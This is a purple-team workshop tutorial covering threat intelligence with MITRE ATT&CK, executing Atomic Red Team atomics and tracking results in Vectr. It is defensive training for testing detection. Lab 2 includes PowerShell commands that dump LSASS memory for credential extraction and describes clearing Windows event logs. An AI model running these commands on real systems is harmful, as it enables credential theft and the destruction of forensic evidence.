Lab 1
Threat Intelligence
The first step to emulating an adversary is to identify and understand that adversary. As famously quoted in Sun Tzu’s Art of War “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” This lab covers the “Know the enemy” part.
In this lab, we will dive into understanding how to recognize and analyze the Tactics, Techniques, and Procedures (TTPs) used by Advanced Persistent Threats (APTs). As cyber threats become more sophisticated, it's essential for security professionals to not only detect attacks but also understand the methods adversaries use to infiltrate and navigate systems.
By the end of the lab, you should be able to do the following:
- Identify an Adversary relevant to your organization
- Recognize the Tactics Techniques and Procedures (TTPs) utilized by the adversary
- Utilize MITRE ATT&CK Navigator to map attack chains per APT
The purpose of this Cyber Threat Intelligence (CTI) is to be able to identify adversaries that are known to attack organizations similar to your own, whether that is your company’s HQ location or industry. These are the threat actors most likely to attack your organization. Try to find an APT that is known to target your industry and organizations where your company is headquartered and take note of that APT for later.
Scroll Down to see the "Techniques Used" for this threat actor.
Here you can see all the techniques that APT28 has been known to use against other organizations.
MITRE has a great, open-source application called “MITRE ATT&CK Navigator” to help visualize the known TTPs of Threat Actors in their database.
Now that we have created a Layer with APT28, consider your organization.
Industry
Finance
Critical Infrastructure
Healthcare
Government
Etc.
Country or Region
USA based organization
Foreign based organization
Which countries are considered an adversary of the country the organization is based?
Note any overlaps in Techniques used as well as any differences. These Tactics Techniques and Procedures (TTPs) are what we emulate in order to understand what our adversary is likely to do when attacking our organization. By understanding these TTPs we can emulate them in order to test our defenses and understand where our visibility gaps are. TTPs are interesting. As you mature as a hacker, you slowly develop what is often referred to as a “Methodology”. These are the steps you take when enumerating machines you are testing, the tools you become comfortable with and gravitate to, the path you take to dump credentials or laterally move, etc. You will develop a “fingerprint” of your own in the same way any Threat Actor does. That is essentially what TTPs are, the fingerprint of a Threat Actor. This is typically how Threat Actors are identified and categorized post breach.
Lab 2
Atomic Red Team Framework
This lab will go over Red Canary’s Atomic Red Team Framework. Atomic Red Team is a library of techniques, scripts, and test case execution automation, all mapped to MITRE ATT&CK’s Technique Numbers. These tests built for each Technique are referred to as “atomics”. This makes it easy to cross reference MITRE ATT&CK CTI Threat Actors and their Techniques to Atomic Red Team’s Atomics.
By the end of this lab you should be able to do the following:
- Navigate Atomic Red Team’s Library of atomics
- Cross Reference a MITRE ATT&CK Technique Number with the Atomic Red Team’s atomic
- Execute test cases based on atomics
Scroll to “Projects” and click on “ATOMIC RED TEAM”
This is the library of Techniques, Test Cases for the Techniques, and how to execute them. Red Canary labels these tests as “Atomics”. There are often many Atomics per technique and sub-technique allowing for a wide variety of ways to test any given technique or situation. You can search for the MITRE ATT&CK Technique number in the search bar to find a specific Atomic matching that technique.
Inside of this are all the Atomics stored locally inside of the VM. We will demonstrate how to utilize these Atomics in this lab.
Here you will see Atomic Red Team’s explanation of the technique. In this case, it is “Command and Scripting Interpreter: Windows Command Shell”
Atomic Red Team has features that allow for automation of test case execution. We will not be going over the automation portion of Atomic Red Team in this workshop, we will be executing test cases manually.
Inside of here you will see one “Windows Command Script” file. Right click and edit this file:
This is a very basic script. This is essentially just a script that calls command prompt to execute a binary “calc.exe”. While calc.exe is not malicious, the behavior of executing a binary in this roundabout way is suspicious and Threat Actors have been known to do this during their attack chains. Malicious executables can be built in a few minutes that can bypass AV/EDR (ask me how I know). Therefore, we want to detect this type of suspicious behavior as opposed to the executable itself.
Command prompt should have opened and then executed the command to launch calc.exe from system32:
Now we will use another technique that is meant to dump the memory from Local Security Authority Subsystem Service (LSASS). My dumping the memory of the LSASS process, we can extract the cached passwords of users who have logged into the machine. This technique is specifically relating to the dump itself though so we won’t go beyond that.
cd ‘C:\users\hacker\Desktop\Atomic Red Team\atomics\T1003.001\src’Import-Module .\Out-Minidump.ps1
get-process lsass
get-process lsass | Out-Minidump
If this works and is not blocked, it will create a file called lsass_[Id Number].dmp in the same folder as the Out-Minidump.ps1 file:
This .dmp file holds credential information because we took a snapshot of the portion of the memory that LSASS was using. Another way we can do the same thing is to dump it from Task Manager directly.
This will effectively do the same thing, create a memory dump of LSASS that can be pulled off the machine and credentials stolen from the dump. The Windows Defender Antivirus may have triggered on either of these techniques.
For our next technique we’ll be destroying evidence of our wrongdoing, but before we destroy the logs let’s take a look at Event Viewer.
Here you will see the 4 main categories of Windows Logs:
Application – Logs relating to applications like Microsoft Edge, Windows Management Instrumentation, .Net Runtime stuff, etc.
Security – Logs relating to authentication, file permissions, logons, etc.
Setup – Logs relating to installation, upgrades, and other OS related setup information
System – Logs related to Windows System Components, Drivers, and other critical Windows functions
Windows by default has most logs sent here. Your organization can customize other items to be sent here and may also send these logs to a centralized Security Information and Event Management server (SIEM). Incident Response and Threat Hunters may use logs like these to aid them in investigation. For this reason, Threat Actors often clear these to cover their tracks. This is suspicious behavior so we want to test to see if we have alerting set up for this situation.
Here you can see the explanation of how this technique is done:
These are just three examples of common techniques that are executed by Threat Actors. As you can see, Red Canary’s Atomic Red Team Framework spells out how to execute these Techniques in a way that is easy to follow. The Techniques we used in this lab are some of the easier ones to execute. These do get more complicated, but as you continue to do these, you will learn as you go and become more comfortable with the more complicated Techniques. As you execute future test cases, don’t just copy and paste commands or execute pre-built binaries in Atomic Red Team. Open up scripts, read through them, do the necessary research to actually understand what is happening and how it works before you execute.
Lab 3
Purple Team Organization and Execution
The other half of the equation is knowing your own organization’s strengths and weaknesses during any phase of an adversary’s chain of attacks. With this information you can understand where to prioritize remediation and fortification of defenses.
By the end of the lab, you should be able to do the following:
- Create a new Purple Team Assessment in Vectr
- Create a new Campaign within the Purple Team assessment
- Document test case results
- Generate reporting and trend metrics for stakeholders
This .yml file is the newest Threat Simulation Index from Security Risk Advisors (SRA). This contains the most recent index (at the time of the Lab’s creation). These are the most common techniques used by 24 active Threat Actors. This index is curated by SRA and updated periodically.
Here you will see the MITRE ATT&CK matrix for the index that was just imported. As you complete test cases and take note of the results, these cells will be color coded based on how strong or weak your organization’s detection/blocking capabilities are for any given test case.
Now that we have created an Assessment, we will create a campaign inside of the assessment. A campaign is a smaller subset of an existing assessment to test against a more specific group of test cases, for example a campaign for AWS or Azure specifically. You could also create a campaign for one particular Threat Actor in an assessment with many Threat Actors. There are many ways you can utilize campaigns within an assessment.
Filter to select relevant TTPs (see next).
TTPs for Documentation:
T1490 – HI – Delete Shadows with vssadmin
T1070.001 – TSI - Clear Windows Event Log entries
T1003.001 – TSI – Dump LSASS memory using Task Manager
T1056 – HI - Keylogger
You will now see the Purple Team Workshop campaign created under the TSI – Threat Simulation Index in the MITRE ATT&CK Alignment page:
This page is where all of the information for the test case resides. This keeps track of the Status of the test case, the Attack Timeline, the Name and Description of the test, the Operators Guidance, Detection Time, Outcome Notes, and Detection/Prevention guidance, as well as any evidence files such as screenshots of alerts or logs. It is a very well-organized means of tracking these test cases. We will simulate the test case outcome.
You will see the Test Case outcome at the top right switch to “Success” and Test Case Outcome will show the “Alerted – Medium” outcome that we selected in the dropdown.
You will see the “Clear Windows Event Logs” test case turned green. This is an indication that the organization has passed this test case.
This will cause the Keylogging test case to turn green. You will also see that the Keylogging test case exists in two columns (two tactics or phases). This is because a Keylogger can be used for both Credential Access as well as Collection of data or other information that a threat actor may want to gather. It should be noted that some test cases may exist in more than one Tactic, but the test case when opened is the same singular test case.
The LSASS Memory test case turned red due to this being a completely failed test case.
This test case turned orange. This is still a failure, but it is not as bad as no logging at all as there are some artifacts left from the technique whereas the LSASS Memory technique indicates the organization was completely blind to the technique.
To visualize what a fully completed heat map would look like, we will navigate to a demo index that is pre-populated with results.
Here you should see a heat map of a completed assessment. The heat map gives an easy means of visualizing which phase of a Threat Actor’s attack chain we have strong defenses, and which need work.
The idea behind all of this is to allow Incident Response a fighting chance at detecting and eradicating a threat before they are able to complete their objective. The more test cases you alert or block on, the better those chances become.
The heat map gives an easy means of visualizing which phase of a Threat Actor’s attack chain we have strong defenses, and which need work.
After an Assessment is completed, the next step is to generate reports that can be disseminated to stakeholders.
Here you can see the results of a completed assessment. The selected assessment had 52 test cases and passed 50% of them. For the test cases in this assessment, 50% of them were either blocked and/or alerted, while the other 50% were only logged or had no artifacts at all.
Scroll down and view the other charts. These are all breakdowns of Phases/Tactics along with the outcomes of the testing. There are several ways this data can be organized and reported upon. The idea is to show progression as you work with the Blue Team to build logs, alerts, and blocks as necessary to improve your resilience to the Threat Actor(s) you test against.
Here you can see the breakdown of individual phases within the attack in chart form in Pie Chart form.
As you periodically test your environment against particular indices, and of course have the blue team remediate failed test cases, you will generate a resilience trendline that can provide the feedback to leadership that the program is generating value. This trendline represents the improvement in your organization’s resilience to attacks from your adversaries.
This page provides breakdowns of the results of testing based on Outcome distribution/counts, which layers of your defense in depth are doing most of the heavy lifting, which phases of the attack chain are you strongest or weakest, as well as breaking down your most successful and least successful campaigns, phases, or techniques.
This data and these charts can be manipulated to fit the needs of your reporting or how stakeholders may want to ingest this information. Vectr provides a wide variety of reporting methods based on the results of your testing. This is often updated in new versions of Vectr.